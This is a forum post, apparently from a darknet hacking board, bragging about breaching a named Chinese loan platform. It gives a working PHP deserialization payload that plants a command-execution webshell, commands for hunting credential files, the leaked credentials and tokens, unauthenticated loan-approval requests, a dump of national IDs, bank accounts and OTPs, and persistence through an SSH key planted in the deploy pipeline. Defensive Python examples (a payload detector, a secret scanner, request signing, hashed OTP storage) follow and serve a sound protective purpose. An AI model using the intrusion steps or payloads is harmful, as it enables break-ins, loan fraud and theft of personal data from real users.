[OPSEC] How I Quietly Breached a Chinese Loan Site Without Making Noise [Target Overview] : hacking | Torhoo darknet markets
Target was a loan platform widely used in CN. The domain? Think d a u x i a o m a n [dot] com. They run mobile, finance portals, and some shit APIs devs forgot to lock down.
Also had staging systems floating around with piss-poor security.
Didn’t come in loud. I didn’t scan like a bot. I sat back, watched, waited.
[Step 1 – Watching Their Mobile Shit]
Grabbed their APK straight from the mobile endpoint. (No link, but you know where to find those.)
Decompiled using JADX.
They weren’t using JSON like normal folks. They were pushing raw serialized PHP objects inside mobile API calls.
Nobody checks that shit anymore. It’s like they were begging.
Example call:
POST to /api/v1/loanStatus
Content-Type: application/octet-stream
Payload: base64 string
That was my way in.
[Step 2 – Smashing Deserialization]
Tested it with garbage data. Boom – backend started leaking class names.
Spotted a Logger class. It had a writable file path and a __destruct function.
Quickly cooked:
O:7:"Logger":2:{s:4:"file";s:13:"/tmp/x.php";s:7:"content";s:20:"<?php system($_GET[c]); ?>";}
Base64’d it, threw it into the API.
Silent 200 response. No errors. No blocks.
I hit the finance subdomain directly at:
finance[.]d a u x i a o m a n[.]com → /tmp/x[.]php
Shell was there.
Wide open.
No WAF. No rate limits. No nothing.
[Step 3 – Slow Crawl]
Didn’t rush DBs. That’s a rookie move. Instead, I slowly walked the box.
Ran:
find / -name "*.env" 2>/dev/null
Found creds sitting under /opt/deploy/.env
Inside:
DB_USER=root
DB_PASS=d a u x i a o 2 0 2 5
INTERNAL_VPN_USER=devstage
INTERNAL_VPN_PASS=stagingpass123
GITHUB_TOKEN=ghp_shitexposed
Also found notes.txt with staging VPN guides and internal IP ranges. Devs were writing down their own fuckups.
[Step 4 – CI/CD Spill]
Used their leaked GitHub token. Accessed their private backend repo (no MFA, good job boys).
Repo had:
Docker setup
Redis keys
Full backend source
Hardcoded internal APIs
Spotted one that made me laugh:
hxxp://10[.]0[.]0[.]5:8000/internal/loan/approve
Yup. An internal loan approval API.
No login. No token. No signature.
[Step 5 – VPN Ride]
Staging VPN wasn’t IP-restricted.
I connected like I was one of their devs.
Used:
openvpn --config staging.ovpn --auth-user-pass creds.txt
Boom, staging net access.
What I reached:
Internal APIs
Staging MySQL
CI/CD runners
They were reusing the same MySQL root creds:
mysql -h 10[.]0[.]0[.]5 -u root -p
No password rotation, nothing.
[Step 6 – API Abuse]
Hit the internal loan approval API. No auth. No checks.
Sample POST:
POST /loan/approve
{
"loan_id": 10981,
"status": "approved",
"amount": "500000"
}
It happily approved fake loans.
I could’ve auto-approved thousands with a bash loop if I wanted.
[Step 7 – Database Walk]
Dumped:
User IDs
National IDs
Bank accounts
Selfies with IDs
SMS OTP logs
Yup, they were storing SMS OTPs in plain text.
For "debugging" they said in some commit message.
Saw entries like:
user_id | phone | otp_code
1001 | +86-138xxxx | 882731
Idiots.
[Step 8 – Staying In]
Injected my SSH key into their deploy scripts.
Every time they pushed code, I got re-injected automatically.
No more webshells needed.
I became part of their pipeline.
[Step 9 – Clean Exit]
Didn’t touch logs.
Didn’t delete anything.
I just blended in by pushing lots of normal-looking loan traffic.
Left my VPN config zipped inside /var/backups with a random name.
You don’t need to hide if you look like part of the furniture.
[Why Noobs Would’ve Missed This]
SQLi? Nah.
Burp Suite default scans? Nope.
VPNs don’t show up in Shodan.
CI/CD abuse doesn’t pop up in basic bug bounties.
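Steps 1 and 2 above describe a mobile API that accepts base64-encoded PHP serialized objects in an application/octet-stream body. What a defender wants is a check that catches that pattern at the edge, before unserialize() ever runs. The following is an added example, not the poster's code and not anything from the target: a small Python scanner that base64-decodes request bodies from a constructed JSON-lines request log, looks for PHP object headers (O:len:"Class":n:{), and also flags headers whose declared class-name length does not match the name, which is typical of hand-built or fuzzed payloads. All paths, class names and log records in it are made up for the example.

```python
import base64
import binascii
import json
import re

# PHP serialized object header: O:<name_len>:"<ClassName>":<prop_count>:{
PHP_OBJECT_RE = re.compile(rb'O:(\d+):"([^"]*)":(\d+):\{')


def decode_body(raw: str) -> bytes:
    """Base64-decode a request body; fall back to the raw bytes if it is not base64."""
    try:
        return base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return raw.encode("utf-8", "surrogateescape")


def find_php_objects(body: bytes):
    """Return (class_name, length_ok) for every serialized-object header in body.

    length_ok is False when the declared name length disagrees with the name,
    which PHP's unserialize() rejects and which usually means a hand-built payload.
    """
    found = []
    for m in PHP_OBJECT_RE.finditer(body):
        declared_len, name = int(m.group(1)), m.group(2).decode("latin-1")
        found.append((name, declared_len == len(name)))
    return found


def scan_requests(log_lines):
    """Scan JSON-lines request records; report bodies that carry PHP serialized objects."""
    findings = []
    for line in log_lines:
        rec = json.loads(line)
        if rec.get("content_type") != "application/octet-stream":
            continue  # the risky pattern on this page is octet-stream + base64
        objs = find_php_objects(decode_body(rec["body"]))
        if objs:
            findings.append({
                "path": rec["path"],
                "classes": [name for name, _ in objs],
                "malformed": [name for name, ok in objs if not ok],
            })
    return findings


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


# Constructed sample log (not real traffic): one benign octet-stream body, one
# well-formed serialized object, one header with a bad length, one JSON request.
SAMPLE_LOG = [
    json.dumps({"path": "/api/v1/loanStatus", "content_type": "application/octet-stream",
                "body": _b64(b'{"loan_id": 10981}')}),
    json.dumps({"path": "/api/v1/loanStatus", "content_type": "application/octet-stream",
                "body": _b64(b'O:9:"AppLogger":2:{s:4:"file";s:10:"/tmp/x.php";'
                             b's:7:"content";s:4:"noop";}')}),
    json.dumps({"path": "/api/v1/loanStatus", "content_type": "application/octet-stream",
                "body": _b64(b'O:7:"Logger":0:{}')}),
    json.dumps({"path": "/api/v1/ping", "content_type": "application/json", "body": "{}"}),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_LOG):
        print(finding)
```

This is the detection side. On the server the matching fix is to stop feeding client input to unserialize() at all (JSON with schema validation), or at minimum to call unserialize($data, ['allowed_classes' => false]) so no class with a __destruct or __wakeup method can be instantiated from a request body.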
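Steps 3 and 4 hinge on a plaintext .env holding database, VPN and GitHub credentials, and on a GitHub token that opened a private repo with internal URLs hardcoded in source. An added example, not from the post or the target: a Python secret scanner of the kind you would run as a pre-commit hook or CI gate over a checkout, exercised on constructed file contents. The key names mirror the post; the values, the token and the paths are invented placeholders.

```python
import re

# Each pattern is checked per line; the env pattern is anchored to the line start.
SECRET_PATTERNS = {
    # Classic GitHub personal access tokens start with ghp_ (real ones are 36 chars
    # after the prefix; the floor is kept low so short placeholder tokens are caught).
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{8,}\b"),
    # KEY=value lines whose key looks like a credential.
    "env_credential": re.compile(r"^\s*[A-Z0-9_]*(?:PASS|PASSWORD|SECRET|TOKEN)[A-Z0-9_]*\s*=\s*\S+"),
    # Hardcoded URLs into 10/8 space, i.e. internal services baked into source.
    "internal_http_url": re.compile(r"https?://10\.\d{1,3}\.\d{1,3}\.\d{1,3}(?::\d+)?[^\s'\"]*"),
}


def redact(value: str) -> str:
    """Keep enough of a match to locate it in the file, never the whole secret."""
    return value[:6] + "***"


def scan_text(path: str, text: str):
    """Return one finding per (line, pattern) hit in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in SECRET_PATTERNS.items():
            m = pattern.search(line)
            if m:
                findings.append({"file": path, "line": lineno, "kind": kind,
                                 "preview": redact(m.group(0))})
    return findings


def scan_files(files):
    """files: {path: content}. Returns all findings; a CI gate fails when this is non-empty."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


# Constructed checkout contents (placeholders only; the key names mirror the post).
SAMPLE_FILES = {
    "/opt/deploy/.env": (
        "DB_USER=root\n"
        "DB_PASS=example-pass-2025\n"
        "INTERNAL_VPN_USER=deployuser\n"
        "INTERNAL_VPN_PASS=example-vpn-pass\n"
        "GITHUB_TOKEN=ghp_exampleexampleexample\n"
    ),
    "backend/config.php": "<?php\n$approve = 'http://10.0.0.5:8000/internal/loan/approve';\n",
    "README.md": "Set DB_PASS in your environment; never commit it.\n",
}

if __name__ == "__main__":
    hits = scan_files(SAMPLE_FILES)
    for h in hits:
        print(f"{h['file']}:{h['line']} {h['kind']} {h['preview']}")
    raise SystemExit(1 if hits else 0)
```

The scanner only finds what is already on disk; the real fixes are short-lived, scoped tokens (and MFA on the account behind them), secrets injected at deploy time from a vault rather than a committed .env, and a routine check that a leaked token was revoked rather than merely rotated in the file.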
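Step 6 shows an internal loan-approval endpoint that accepts any POST with no login, token or signature. An added example, not code from the target: a Python request-signing scheme with a shared key, timestamp window and nonce cache, showing the client side (sign_request) and the server side (ApprovalGate.verify), and how an unsigned, tampered, replayed or stale request is rejected. The key, the path and the loan body are constructed for the example; a real deployment would use per-service keys from a secrets manager or mTLS between services, which this does not show.

```python
import hashlib
import hmac
import json
import secrets
import time

# Constructed shared key for the example only.
SHARED_KEY = b"constructed-example-key-not-real"


def canonical(method: str, path: str, body: bytes, ts: int, nonce: str) -> bytes:
    """Bytes that get signed: method, path, timestamp, nonce and a hash of the body."""
    body_hash = hashlib.sha256(body).hexdigest()
    return f"{method.upper()}\n{path}\n{ts}\n{nonce}\n{body_hash}".encode()


def sign_request(key: bytes, method: str, path: str, body: bytes, ts=None, nonce=None) -> dict:
    """Client side: produce the auth headers for one request."""
    ts = int(time.time()) if ts is None else ts
    nonce = secrets.token_hex(16) if nonce is None else nonce
    sig = hmac.new(key, canonical(method, path, body, ts, nonce), hashlib.sha256).hexdigest()
    return {"X-Timestamp": str(ts), "X-Nonce": nonce, "X-Signature": sig}


class ApprovalGate:
    """Server side: reject anything not freshly signed with the shared key."""

    def __init__(self, key: bytes, window: int = 300):
        self.key = key
        self.window = window   # seconds of clock skew tolerated
        self.seen = {}         # nonce -> timestamp, pruned on each call

    def verify(self, method: str, path: str, body: bytes, headers: dict, now=None):
        now = int(time.time()) if now is None else now
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        try:
            ts = int(headers["X-Timestamp"])
            nonce = headers["X-Nonce"]
            sig = headers["X-Signature"]
        except (KeyError, ValueError):
            return False, "missing or malformed auth headers"
        if abs(now - ts) > self.window:
            return False, "timestamp outside window"
        if nonce in self.seen:
            return False, "replayed nonce"
        expected = hmac.new(self.key, canonical(method, path, body, ts, nonce),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, sig):
            # Checked before recording the nonce, so unsigned junk cannot burn nonces.
            return False, "bad signature"
        self.seen[nonce] = ts
        return True, "ok"


def demo():
    """Walk one approval request through the gate under each outcome."""
    gate = ApprovalGate(SHARED_KEY)
    path = "/loan/approve"
    body = json.dumps({"loan_id": 10981, "status": "approved", "amount": "500000"}).encode()
    t0 = 1_700_000_000
    results = {}
    results["unsigned"] = gate.verify("POST", path, body, {}, now=t0)
    h1 = sign_request(SHARED_KEY, "POST", path, body, ts=t0, nonce="n1")
    results["signed"] = gate.verify("POST", path, body, h1, now=t0)
    results["replay"] = gate.verify("POST", path, body, h1, now=t0 + 1)
    h2 = sign_request(SHARED_KEY, "POST", path, body, ts=t0, nonce="n2")
    results["tampered"] = gate.verify("POST", path, body.replace(b"500000", b"999999"), h2, now=t0)
    h3 = sign_request(SHARED_KEY, "POST", path, body, ts=t0, nonce="n3")
    results["stale"] = gate.verify("POST", path, body, h3, now=t0 + 1000)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The signature covers the method, path and body hash, so the same headers cannot be moved to a different endpoint or a different amount; the nonce cache is what stops a captured approval from being replayed inside the clock window.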
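Step 7 reports SMS OTP codes stored in plaintext in the database. An added example, not from the post: a Python OtpStore that keeps only a keyed hash of each code together with an expiry and an attempt counter, so a database dump does not yield usable codes and a guessed code cannot be brute-forced. The pepper, user ids and timestamps are constructed; the optional code argument to issue() exists only so the example is deterministic.

```python
import hashlib
import hmac
import secrets


class OtpStore:
    """Keeps a keyed hash of each SMS code, never the code itself, plus expiry and an attempt cap."""

    def __init__(self, pepper: bytes, ttl: int = 300, max_attempts: int = 5):
        self.pepper = pepper          # server-side secret, kept out of the database
        self.ttl = ttl
        self.max_attempts = max_attempts
        self._rows = {}               # user_id -> [digest, expires_at, attempts]

    def _digest(self, user_id: str, code: str) -> str:
        # Keyed so that a dump of the rows alone is not enough to brute-force 6-digit codes.
        return hmac.new(self.pepper, f"{user_id}:{code}".encode(), hashlib.sha256).hexdigest()

    def issue(self, user_id: str, now: int, code: str = None) -> str:
        """Create a code for delivery by SMS. The code argument is only for deterministic tests."""
        if code is None:
            code = f"{secrets.randbelow(10**6):06d}"
        self._rows[user_id] = [self._digest(user_id, code), now + self.ttl, 0]
        return code   # hand to the SMS sender; do not log or persist it

    def verify(self, user_id: str, code: str, now: int):
        row = self._rows.get(user_id)
        if row is None:
            return False, "no pending code"
        if now > row[1]:
            del self._rows[user_id]
            return False, "expired"
        if row[2] >= self.max_attempts:
            del self._rows[user_id]
            return False, "too many attempts"
        row[2] += 1
        if hmac.compare_digest(row[0], self._digest(user_id, code)):
            del self._rows[user_id]   # single use
            return True, "ok"
        return False, "wrong code"

    def stored_record(self, user_id: str):
        """What a database dump would contain for this user (for inspection only)."""
        return self._rows.get(user_id)


if __name__ == "__main__":
    store = OtpStore(b"constructed-pepper")
    code = store.issue("1001", now=1000)
    print("row on disk:", store.stored_record("1001"))
    print(store.verify("1001", code, now=1010))
```

The row that reaches storage is a 64-hex-character digest, an expiry and a counter; the "debugging" value the post describes never exists server-side after the SMS is sent.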